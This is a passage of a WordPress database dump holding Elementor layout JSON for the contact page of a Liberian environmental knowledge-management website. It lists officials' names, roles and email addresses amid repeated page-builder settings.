_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong>\\n\\nDirector, Ministry of Agriculture\\n\\n<a href=\\\"mailto:Fwmwah1958@yahoo.com\\\">Fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong>\\n\\nAssist. Minister, Ministry of Mines and Energy\\n\\n<a href=\\\"mailto:John.willabo@yahoo.com\\\">John.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong>\\nLand Use Management Manager, LLA\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong>\\n\\nManager, CCCD Project\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3be33d2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong>\\n\\nAssist. Minister, Ministry of Mines and Energy\\n\\n<a href=\\\"mailto:John.willabo@yahoo.com\\\">John.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65b2d7b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong>\\nLand Use Management Manager, LLA\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(14820,2351,'_elementor_edit_mode','builder'),(14821,2351,'_elementor_template_type','wp-page'),(14822,2351,'_elementor_version','2.7.5'),(14823,2351,'_wp_page_template','default'),(14824,2351,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aa147aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact Form Coming up\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer<br>\\n\\nUNCBD Focal Point\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong>\\n<br>\\nMEAs Coordinator\\n<br>\\nUNFCCC Focal Point\\n<br>\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"98a945e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\nGIS Coordinator<br>\\nUNCCD Focal Point<br>\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong><br>\\n\\nCoordinator Climate Change Secretariat<br>\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\\n\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:Kamara.ed14@gmail.com\\\">Kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong>\\nConservation Manager, FDA\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamag@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong>\\n\\nDirector, Ministry of Agriculture\\n\\n<a href=\\\"mailto:Fwmwah1958@yahoo.com\\\">Fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong>\\n\\nAssist. Minister, Ministry of Mines and Energy\\n\\n<a href=\\\"mailto:John.willabo@yahoo.com\\\">John.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong>\\nLand Use Management Manager, LLA\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"col